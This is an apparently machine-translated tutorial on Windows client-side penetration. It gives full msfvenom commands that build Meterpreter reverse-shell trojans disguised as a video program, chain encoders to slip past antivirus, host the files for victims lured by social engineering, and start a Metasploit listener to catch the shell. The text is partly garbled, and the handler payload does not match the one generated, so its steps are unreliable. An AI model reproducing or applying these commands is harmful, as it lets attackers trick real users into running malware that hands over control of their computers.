Penetration based on Windows client
Principle of Client Penetration
When we cannot break through the network boundary of the other party, we often need to use client penetration to attack the target. For example, we send a program containing a backdoor to the target, or a word document or pdf file. In order to achieve the effect, it is also necessary to make good use of social engineering to lure victims to execute malicious programs.
Since there is anti-virus software, we can use color websites or avoid killing to avoid killing.
Avoid killing can be done by modifying binary characteristic characters or encrypting.
combat
Making Windows Malware Get a Shell
msfvenom is a combination of msfpayload and msfencode, which can generate a Trojan horse program by using msfvenom, execute it on the target machine, and monitor it locally .
Generate xx video.exe backdoor program
use an encoder
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html /xx video1.exe
Use two encoders to further enhance avoidance capabilities
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe
Parameter Description
-a specifies the architecture, such as: x86 and x64, x86 represents 32 bits, and x64 represents 64 bits.
–platform specifies the platform, choose windows here, you can view all supported platforms through –l platforms
-p set attack payload
-b remove bad characters, bad characters will affect the normal execution of payload
start apache2
Instruction: systemctl start apache2
Go to the target machine to browse, click download to open
Order:
Go back to kali and start monitoring
Command: msf
Enter the multi/handler module
set payload
命令:set payload windows/meterpreter/reverse_http
Set the shell used to accept bounces from the target machine
start attacking
command: run
ell
[External link image transfer...(img-XISI9keB-1674722619984)]
start attacking
command: run